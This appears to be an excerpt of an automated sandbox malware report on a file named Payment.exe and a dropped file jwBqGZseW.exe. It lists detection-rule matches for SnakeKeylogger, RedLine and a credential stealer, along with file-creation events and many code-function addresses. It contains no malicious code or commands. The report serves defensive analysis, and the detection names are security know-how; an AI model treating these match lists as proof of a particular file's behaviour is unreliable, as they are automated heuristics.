                  Source: 39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 39.2.jwBqGZseW.exe.36d0d3e.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 39.2.jwBqGZseW.exe.36d0d3e.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 39.2.jwBqGZseW.exe.36d0d3e.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Payment.exe.3f7a328.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 39.2.jwBqGZseW.exe.5d10000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 39.2.jwBqGZseW.exe.5d10000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 39.2.jwBqGZseW.exe.5d10000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 8.2.Payment.exe.3c40000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.Payment.exe.3c40000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 8.2.Payment.exe.3c40000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Payment.exe.411b348.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.Payment.exe.3f7a328.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 39.2.jwBqGZseW.exe.5d10000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 39.2.jwBqGZseW.exe.5d10000.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 39.2.jwBqGZseW.exe.5d10000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 8.2.Payment.exe.3c40f20.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.Payment.exe.3c40f20.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 8.2.Payment.exe.3c40f20.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 18.2.jwBqGZseW.exe.44e24c8.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 8.2.Payment.exe.3c40f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.Payment.exe.3c40f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 8.2.Payment.exe.3c40f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: Process Memory Space: Payment.exe PID: 7248, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: jwBqGZseW.exe PID: 6056, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: initial sampleStatic PE information: Filename: Payment.exe
                  Source: C:\Windows\System32\AppVClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\89ead7124fd5c239.bin
                  Source: C:\Windows\System32\FXSSVC.exeFile created: C:\Windows\TEMP\FXSSVCDebugLogFile.txt
                  Source: C:\Windows\System32\Spectrum.exeFile created: C:\Windows\Temp\DiagOutputDir
                  Source: C:\Windows\System32\wbengine.exeFile created: C:\Windows\Logs\WindowsBackup
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_0145D4040_2_0145D404
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_02ED1BF00_2_02ED1BF0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_02ED00400_2_02ED0040
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_02ED00060_2_02ED0006
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_052EDE500_2_052EDE50
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_052E8F290_2_052E8F29
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_052E80C80_2_052E80C8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_052E80D80_2_052E80D8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_07483B380_2_07483B38
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_074878F00_2_074878F0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_074886400_2_07488640
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_074886300_2_07488630
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_0748F3780_2_0748F378
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_074873910_2_07487391
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_074873A00_2_074873A0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_07486F580_2_07486F58
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_07486F680_2_07486F68
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_07488FE00_2_07488FE0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_07488FF00_2_07488FF0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_07483B2B0_2_07483B2B
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_07486B300_2_07486B30
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_00408C608_2_00408C60
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0040DC118_2_0040DC11
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_00407C3F8_2_00407C3F
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_00418CCC8_2_00418CCC
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_00406CA08_2_00406CA0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_004028B08_2_004028B0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0041A4BE8_2_0041A4BE
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_004182448_2_00418244
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_00402F208_2_00402F20
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_004193C48_2_004193C4
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_004187888_2_00418788
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_00402F898_2_00402F89
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_00402B908_2_00402B90
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_004073A08_2_004073A0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E482868_2_02E48286
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E4B8F68_2_02E4B8F6
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E47B718_2_02E47B71
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E46EAF8_2_02E46EAF
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E47F808_2_02E47F80
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E705D08_2_02E705D0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_03ADD20B8_2_03ADD20B
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_03ADD7B88_2_03ADD7B8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_03ADA6088_2_03ADA608
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_03ADC6588_2_03ADC658
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_03AD74E08_2_03AD74E0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_03ADD4E08_2_03ADD4E0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_03ADDA908_2_03ADDA90
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_03ADC9808_2_03ADC980
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_03AD586F8_2_03AD586F
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_03ADCF308_2_03ADCF30
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_03ADEEE08_2_03ADEEE0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_03AD6E208_2_03AD6E20
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_03ADCC588_2_03ADCC58
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_03AD43118_2_03AD4311
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_03ADC6A88_2_03ADC6A8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_03AD2F298_2_03AD2F29
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_03ADEED08_2_03ADEED0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A7FE08_2_070A7FE0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A8A408_2_070A8A40
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A98188_2_070A9818
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A23008_2_070A2300
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AAF008_2_070AAF00
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A771F8_2_070A771F
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AAF108_2_070AAF10
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070ACF298_2_070ACF29
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A53228_2_070A5322
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070ACF388_2_070ACF38
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A53308_2_070A5330
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A77308_2_070A7730
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A27488_2_070A2748
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A27588_2_070A2758
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AEF518_2_070AEF51
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AEF608_2_070AEF60
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A57788_2_070A5778
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A7B798_2_070A7B79
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A57888_2_070A5788
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A7B888_2_070A7B88
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AB39A8_2_070AB39A
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AB3A88_2_070AB3A8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A2BA18_2_070A2BA1
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A2BB08_2_070A2BB0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A7FCF8_2_070A7FCF
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AD3C08_2_070AD3C0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AD3D08_2_070AD3D0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A5BD08_2_070A5BD0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AF3E98_2_070AF3E9
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A5BE08_2_070A5BE0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AF3F88_2_070AF3F8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A2FF78_2_070A2FF7
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AC6088_2_070AC608
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AE6208_2_070AE620
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AE6308_2_070AE630
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A8A318_2_070A8A31
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A1A408_2_070A1A40
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A1A508_2_070A1A50
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AAA688_2_070AAA68
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AAA788_2_070AAA78
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A4A728_2_070A4A72
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A6E708_2_070A6E70
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A4A808_2_070A4A80
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A6E808_2_070A6E80
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070ACA928_2_070ACA92
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A1E978_2_070A1E97
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A1EA88_2_070A1EA8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070ACAA08_2_070ACAA0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AEAB88_2_070AEAB8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AEAC88_2_070AEAC8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A4EC78_2_070A4EC7
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A4ED88_2_070A4ED8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A72D88_2_070A72D8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A72D28_2_070A72D2
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A22F18_2_070A22F1
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070ADD008_2_070ADD00
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A3D108_2_070A3D10
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A0D398_2_070A0D39
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AA1398_2_070AA139
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A0D488_2_070A0D48
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AA1488_2_070AA148
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AC1618_2_070AC161
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AC1708_2_070AC170
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AE1888_2_070AE188
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AE1988_2_070AE198
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A11908_2_070A1190
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A11A08_2_070A11A0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AA5D18_2_070AA5D1
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A15E98_2_070A15E9
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AA5E08_2_070AA5E0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A15F88_2_070A15F8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AC5F88_2_070AC5F8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A30088_2_070A3008
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A00068_2_070A0006
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A98078_2_070A9807
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A60278_2_070A6027
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A60388_2_070A6038
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AB8308_2_070AB830
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A00408_2_070A0040
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AB8408_2_070AB840
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AD8588_2_070AD858
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A34528_2_070A3452
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AD8688_2_070AD868
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A34608_2_070A3460
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A04888_2_070A0488
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A64828_2_070A6482
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AF8818_2_070AF881
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A04988_2_070A0498
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A64908_2_070A6490
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070AF8908_2_070AF890
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A38A98_2_070A38A9
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A9CA28_2_070A9CA2
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A38B88_2_070A38B8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A9CB08_2_070A9CB0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070ABCC88_2_070ABCC8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070ABCD88_2_070ABCD8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A68D88_2_070A68D8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A08DF8_2_070A08DF
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A68E88_2_070A68E8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070A08F08_2_070A08F0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_070ADCF08_2_070ADCF0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C64188_2_071C6418
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CE1388_2_071CE138
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C49808_2_071C4980
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C50D88_2_071C50D8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C091F8_2_071C091F
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CB1188_2_071CB118
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C7C198_2_071C7C19
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CC9198_2_071CC919
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C201A8_2_071C201A
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C370F8_2_071C370F
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C99088_2_071C9908
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CE6088_2_071CE608
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C64088_2_071C6408
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CB1088_2_071CB108
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C00068_2_071C0006
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C94388_2_071C9438
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C5F388_2_071C5F38
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CAC388_2_071CAC38
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CF9388_2_071CF938
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C09308_2_071C0930
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C20288_2_071C2028
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C7C288_2_071C7C28
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CC9288_2_071CC928
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CE1288_2_071CE128
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C94298_2_071C9429
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C37208_2_071C3720
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C29588_2_071C2958
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C77588_2_071C7758
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CC4588_2_071CC458
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C8F588_2_071C8F58
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CDC588_2_071CDC58
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CC4578_2_071CC457
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C40508_2_071C4050
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C12518_2_071C1251
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C5F488_2_071C5F48
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CAC488_2_071CAC48
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CF9488_2_071CF948
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C29488_2_071C2948
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C774A8_2_071C774A
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C00408_2_071C0040
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C40428_2_071C4042
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C5A788_2_071C5A78
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CA7788_2_071CA778
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CF4788_2_071CF478
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C32788_2_071C3278
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C727A8_2_071C727A
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C49718_2_071C4971
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CA7728_2_071CA772
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C8F688_2_071C8F68
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CDC688_2_071CDC68
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C5A688_2_071C5A68
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CF4688_2_071CF468
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C12608_2_071C1260
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C8A988_2_071C8A98
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CD7988_2_071CD798
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C55988_2_071C5598
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CEF9A8_2_071CEF9A
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C1B908_2_071C1B90
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C32888_2_071C3288
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C72888_2_071C7288
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CBF888_2_071CBF88
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CD7888_2_071CD788
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C8A898_2_071C8A89
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CBF878_2_071CBF87
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C1B818_2_071C1B81
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C3BB88_2_071C3BB8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C6DB88_2_071C6DB8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CBAB88_2_071CBAB8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C0DB88_2_071C0DB8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C85B98_2_071C85B9
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C24B08_2_071C24B0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C55A88_2_071C55A8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CA2A88_2_071CA2A8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CEFA88_2_071CEFA8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C3BA88_2_071C3BA8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C6DAA8_2_071C6DAA
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CBAAA8_2_071CBAAA
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CA2A28_2_071CA2A2
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C04D88_2_071C04D8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C9DD88_2_071C9DD8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CEAD88_2_071CEAD8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C44D88_2_071C44D8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CB5D88_2_071CB5D8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C68D98_2_071C68D9
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C50D18_2_071C50D1
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C0DC88_2_071C0DC8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C85C88_2_071C85C8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CD2C88_2_071CD2C8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C04C88_2_071C04C8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C9DC88_2_071C9DC8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CEAC88_2_071CEAC8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C24C08_2_071C24C0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C16F88_2_071C16F8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C80F88_2_071C80F8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CCDF88_2_071CCDF8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C98F88_2_071C98F8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CE5F88_2_071CE5F8
